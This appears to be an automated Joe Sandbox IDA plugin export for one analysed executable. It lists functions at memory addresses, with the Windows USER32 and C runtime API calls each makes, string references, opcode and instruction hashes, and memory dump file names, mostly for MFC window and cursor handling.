Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClientScreen$LongMessageParentSendWindow
String ID:
API String ID: 4240056119-0
Opcode ID: 23ed6460752bd652831b08ac5271198ee3d1e1cfac25f3858e3d168774a7e932
Instruction ID: a9da584d87dd624b11408c5e977257a44be6bd4454912a3199d33547346e1531
Opcode Fuzzy Hash: 23ed6460752bd652831b08ac5271198ee3d1e1cfac25f3858e3d168774a7e932
Instruction Fuzzy Hash: 38F06D36201524A7E7211B19AC04BBF3B5CEF96761F244211FD25D6180DE75EA05D6A4

Function 0051F55B Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(00000000), ref: 0051F571
ScreenToClient.USER32(?,00000000), ref: 0051F57E
PtInRect.USER32(?,00000000,00000000), ref: 0051F591
LoadCursorW.USER32(00000000,00007F86), ref: 0051F5B0
SetCursor.USER32(00000000), ref: 0051F5BC

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Cursor$ClientLoadRectScreen
String ID:
API String ID: 2747913190-0
Opcode ID: bb9b96b915d215421bd0ffbea5132eb397afd2a8f31cef95293dfb002d860a1c
Instruction ID: 9e219706a72f9d62c04dc7d3e0b07dfe8c8b69a11c5abe97a7ffadb16411117c
Opcode Fuzzy Hash: bb9b96b915d215421bd0ffbea5132eb397afd2a8f31cef95293dfb002d860a1c
Instruction Fuzzy Hash: 39014C72500249BBDB106FA1DC08FBE7FBAFB19349F004425B516D2160DB75DA44EB10

Function 005075FD Relevance: 7.5, APIs: 5, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00507619
_memset.LIBCMT ref: 00507633
GetKeyboardLayout.USER32(?), ref: 00507643
MapVirtualKeyW.USER32(?,00000000), ref: 00507661
ToUnicodeEx.USER32(?,00000000), ref: 0050766B

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Keyboard$Exception@8H_prolog3LayoutStateThrowUnicodeVirtual_memset
String ID:
API String ID: 4204171240-0
Opcode ID: 195290af552627ac6561bb2bbff21d5f480b6b096cd115abc120aa24a9d1839d
Instruction ID: d5561babc112b38eec77da08c34a3f857af85d1fcb8118562f833f62c782b6ce
Opcode Fuzzy Hash: 195290af552627ac6561bb2bbff21d5f480b6b096cd115abc120aa24a9d1839d
Instruction Fuzzy Hash: 53016771600109BFDB10ABA4DC46FEE7BBCEF14700F4040AAB646DA091DF749A84DF55

Function 004D5350 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 494COMMON

Download Yara Rule

APIs

Part of subcall function 004D7F90: std::_Lockit::_Lockit.LIBCPMT ref: 004D7FA4

Part of subcall function 004D6960: std::_Lockit::_Lockit.LIBCPMT ref: 004D698C
Part of subcall function 004D6960: std::_Lockit::_Lockit.LIBCPMT ref: 004D69AF

std::_Lockit::_Lockit.LIBCPMT ref: 004D53D9
_localeconv.LIBCMT ref: 004D544F
_strcspn.LIBCMT ref: 004D556A

Strings

e, xrefs: 004D5462

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: LockitLockit::_std::_$_localeconv_strcspn
String ID: e
API String ID: 331173946-4024072794
Opcode ID: a323b4ea05bf8036dd7aac2c1dd5a61b4a9ea21d9d5bdf10182d9f992aebdfb5
Instruction ID: 9fc0add083f3900c3fca1e92f9eb75cf1c5d2b62f0cf85952ea0bb4799797e1e
Opcode Fuzzy Hash: a323b4ea05bf8036dd7aac2c1dd5a61b4a9ea21d9d5bdf10182d9f992aebdfb5
Instruction Fuzzy Hash: 01124A75E006489FCB14CFA8C894ADEBBB5FF88304F15825AE809AB355DB34AD05CF94

Function 005772A2 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 239COMMONLIBRARYCODE

Download Yara Rule

APIs

OffsetRect.USER32(-00000018,00000000,00000000), ref: 0057737F
__EH_prolog3.LIBCMT ref: 005773A2
GetSystemMetrics.USER32(00000002), ref: 0057740F

Part of subcall function 004EEAAD: __EH_prolog3.LIBCMT ref: 004EEAB4

Strings

NV, xrefs: 0057756C

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3$MetricsOffsetRectSystem
String ID: NV
API String ID: 1613555380-2996624706
Opcode ID: 4c616387ef0aab4257b3f1e2db194d4ae901251c7a6361a7699a110deecc8f20
Instruction ID: f6acd930e5920160881b293bbc55c931c36a846a9cc176ea262a2221fbe0871d
Opcode Fuzzy Hash: 4c616387ef0aab4257b3f1e2db194d4ae901251c7a6361a7699a110deecc8f20
Instruction Fuzzy Hash: FBA16331A00709DFCB10DFA9E889AAEBBF1FF48314F14856EE41AA7251DB34A940DF54

Function 0052831B Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 211windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00528322
SendMessageW.USER32(?,00000229,00000000,00000000), ref: 0052834F
GetWindow.USER32(?,00000005), ref: 005283B9

Part of subcall function 005285BF: BringWindowToTop.USER32(?), ref: 00528651
Part of subcall function 005285BF: RedrawWindow.USER32(?,00000000,00000000,00000585), ref: 00528690
Part of subcall function 005285BF: RedrawWindow.USER32(?,00000000,00000000,00000585), ref: 005286A0

Part of subcall function 004ECD55: ShowWindow.USER32(00000000,?,?,004DC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 004ECD66

Strings

83`, xrefs: 005283F5, 0052853C, 0052857F

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Redraw$BringH_prolog3MessageSendShow
String ID: 83`
API String ID: 603925361-1826646354
Opcode ID: ad5d8c0b7482a0bdfc41ec6ddb29e049ae5031cdc441be3b44b56e721b799504
Instruction ID: 659f8aa6dcba8a1acf5bd6d4db899096d189aa078e291d2eaa58480dbb69e894
Opcode Fuzzy Hash: ad5d8c0b7482a0bdfc41ec6ddb29e049ae5031cdc441be3b44b56e721b799504
Instruction Fuzzy Hash: 7D719F30A02225AFCF15AFA1D889ABD7BA5BF45B10F14446EF805AB2D5DF749D40CB90

Function 004D4AC0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 004D4C87

Strings

+, xrefs: 004D4C1B
$, xrefs: 004D4B18
%, xrefs: 004D4C0D

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: swprintf
String ID: $$%$+
API String ID: 233258989-3202472541
Opcode ID: dbd390789499f58ec12fe299c8e6feecc41eec6cabe4eeac22d7816522e4f444
Instruction ID: 8f5d1f2715dabb0d05fa042b25a4a7500c8b15431f4e168a70fee7a8f248f726
Opcode Fuzzy Hash: dbd390789499f58ec12fe299c8e6feecc41eec6cabe4eeac22d7816522e4f444
Instruction Fuzzy Hash: 32519872A093005BCB159E48C9A479B7BE4EBD1700F21594FF98193392E67DDC458BCA

Function 004D4CD0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 177COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 004D4E85

Strings

$, xrefs: 004D4D28
%, xrefs: 004D4E0B
+, xrefs: 004D4E19

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: swprintf
String ID: $$%$+
API String ID: 233258989-3202472541
Opcode ID: c60e4292596159083e9f6149d92f0709a0db251b4e942dcecb07e86def6193bd
Instruction ID: 29a07f0226802439593f3ea460f47ea8a6a1956edeafc86ae02e7460129c344e
Opcode Fuzzy Hash: c60e4292596159083e9f6149d92f0709a0db251b4e942dcecb07e86def6193bd
Instruction Fuzzy Hash: 54516A72A043006BDB259E48C9A479B7BE6BBC5700F245A4FE98193392D73D8C458BDB

Function 0050F686 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 164COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0050F6C2
GetWindowRect.USER32(?,?), ref: 0050F75F
IsRectEmpty.USER32(?), ref: 0050F769

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Strings

X`, xrefs: 0050F6DF, 0050F6F4

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$EmptyException@8H_prolog3Throw
String ID: X`
API String ID: 2711673171-2458266361
Opcode ID: 822fd1b00f47cd690e4ffd086d2d8bf84076924834775601690a314a920cc838
Instruction ID: a5cfa1d9e0933921a0b62cdfc9281ef0e765dde3caeeb33543b32054a40e8b18
Opcode Fuzzy Hash: 822fd1b00f47cd690e4ffd086d2d8bf84076924834775601690a314a920cc838
Instruction Fuzzy Hash: F4610570A00209DFCB25CFA9C588AEEBBF5FF48700F148469D415E7690DB34AD40CB65

Function 00526E9C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00526F64
GetWindowRect.USER32(?,?), ref: 00526F7C
UnionRect.USER32(?,?,?), ref: 00526F87

Strings

83`, xrefs: 00526EEC, 00526F23

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$Union
String ID: 83`
API String ID: 4061794321-1826646354
Opcode ID: ea774b4039d93d8ee5fe0f984226d506f474f775c2d665ff8d34ae53e16da2af
Instruction ID: 7229645ee353582de374b73ecabf1de18417b97d879d8f3b1dd4a37414979618
Opcode Fuzzy Hash: ea774b4039d93d8ee5fe0f984226d506f474f775c2d665ff8d34ae53e16da2af
Instruction Fuzzy Hash: 56414775900209AFCB15EFA9D9858EEFBF9FF89300F14441EE116A7291DB31AA45CB20

Function 0050A501 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0050A564
OffsetRect.USER32(?,?,?), ref: 0050A5A0
FillRect.USER32(?,?), ref: 0050A5DE

Part of subcall function 004EEAAD: __EH_prolog3.LIBCMT ref: 004EEAB4

Strings

c, xrefs: 0050A536

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$FillH_prolog3OffsetWindow
String ID: c
API String ID: 1391168360-2927717585
Opcode ID: 4315a0813e059256864b413a680bd992be48bb0f8a62c6d0adfc24168ade395e
Instruction ID: fc990fa10e19bfd2238dcb8137689f4c564f1a7af840cfc413c563fe713bd2c9
Opcode Fuzzy Hash: 4315a0813e059256864b413a680bd992be48bb0f8a62c6d0adfc24168ade395e
Instruction Fuzzy Hash: AD4150719006199FCF01EFA9D9859EEBBBAFF49300B14046AF905EB251CB719E05CBA1

Function 00502019 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0050204A
FillRect.USER32(?,?), ref: 005020FD

Strings

P1d, xrefs: 00502113

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: FillParentRect
String ID: P1d
API String ID: 1540079046-528438609
Opcode ID: 7eace3e2e8ed2a6e0a514aab018704da3409dcd6bc775cad579a2e5ef91a8b82
Instruction ID: 213e3c542cd4b29f01a287cb9403ec032107296ecb6b76ab7125c9809ae1e3e0
Opcode Fuzzy Hash: 7eace3e2e8ed2a6e0a514aab018704da3409dcd6bc775cad579a2e5ef91a8b82
Instruction Fuzzy Hash: 0931A231500204EBCF00DFA5CC9DAAE7BAAFF49314F11056AFA059B291DB75DE04CBA0

Function 0050B6D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100windowCOMMON

Download Yara Rule

APIs

ReleaseCapture.USER32 ref: 0050B7F4

Part of subcall function 00585637: SetRectEmpty.USER32(?), ref: 0058568D
Part of subcall function 00585637: IsRectEmpty.USER32(?), ref: 00585697
Part of subcall function 00585637: SetRectEmpty.USER32(?), ref: 005856EE
Part of subcall function 00585637: SetRectEmpty.USER32(?), ref: 005856F4

IsWindowVisible.USER32(?), ref: 0050B711
GetParent.USER32(?), ref: 0050B744

Strings

c, xrefs: 0050B7A6

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: EmptyRect$CaptureParentReleaseVisibleWindow
String ID: c
API String ID: 1768054721-2927717585
Opcode ID: 60bf6a84afdbe840a55e25c00027b2e02e50320a57bf57e76ed6dfaa1322b3bd
Instruction ID: 38455b7830ee23a068ca23e895b71239ab92c1d124777442f94974a69abd0f58
Opcode Fuzzy Hash: 60bf6a84afdbe840a55e25c00027b2e02e50320a57bf57e76ed6dfaa1322b3bd
Instruction Fuzzy Hash: 7C31A4313006029FEB25AB69C899BBEBBA6FF84701F15006DE589872E1DF615C41CB55

Function 00529760 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON

Download Yara Rule

Strings

L>a, xrefs: 0052980F
LA`, xrefs: 005297FF
`c, xrefs: 00529837

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID:
String ID: L>a$LA`$`c
API String ID: 0-2488346406
Opcode ID: c9e8286feef1d9d10d74679058a215ff4eaf4aa317c0aacae37dafe08e99b393
Instruction ID: 48c950d8f35852de2b8bb401a52ab7cd62dc11d6c5c3c3ce7db305af4f12392b
Opcode Fuzzy Hash: c9e8286feef1d9d10d74679058a215ff4eaf4aa317c0aacae37dafe08e99b393
Instruction Fuzzy Hash: 903198313047269A9F14A632ADD19BE2ADAFF93754F0A043BE44BD63C6DF18ED0182D4

Function 00554CCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00554CD1
CopyRect.USER32(?,?), ref: 00554D16
GetClientRect.USER32(?,?), ref: 00554D31

Strings

Afx:DockPane, xrefs: 00554DB7

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$ClientCopyH_prolog3_
String ID: Afx:DockPane
API String ID: 871324638-3269875795
Opcode ID: 9ce240255a4fd1e363fc974f02eed8bdea2fbcdd9fe9690052db458ecd6f7712
Instruction ID: 1be1f13c8190341d73ee8545e899ee1ba7852570559520179df9c17469e498ed
Opcode Fuzzy Hash: 9ce240255a4fd1e363fc974f02eed8bdea2fbcdd9fe9690052db458ecd6f7712
Instruction Fuzzy Hash: FD4106719002089FDF44DF94C899AEEBBB5FF08314F14846AF90AEB251CB349945CF60

Function 004EC48F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMT ref: 004EC4DA
__snwprintf_s.LIBCMT ref: 004EC50C

Part of subcall function 005CE629: __getptd_noexit.LIBCMT ref: 005CE629

Strings

Afx:%p:%x:%p:%p:%p, xrefs: 004EC502
Afx:%p:%x, xrefs: 004EC4D0

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: __snwprintf_s$__getptd_noexit
String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
API String ID: 101746997-2801496823
Opcode ID: 9798716a1588e22eae29ad21c2d307264ac1998a6e53d0f685397dcaad824a00
Instruction ID: 8a6c28ac1b5c217b13e3c520d2020c4a22b3257f4c71a07d3cfc1e52a03dcff8
Opcode Fuzzy Hash: 9798716a1588e22eae29ad21c2d307264ac1998a6e53d0f685397dcaad824a00
Instruction Fuzzy Hash: 403170B5D00209EFCB11EFA6D842AAE7BB4FF98351F00402BF905AB351D734A951CB66

Function 0052EB3A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0052EB41

Part of subcall function 0055EBDB: __EH_prolog3.LIBCMT ref: 0055EBE2

Part of subcall function 004ECCD1: GetDlgCtrlID.USER32(?), ref: 004ECCDA

Strings

%sBasePane-%d%x, xrefs: 0052EBAA
%sBasePane-%d, xrefs: 0052EB93
IsVisible, xrefs: 0052EC16

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
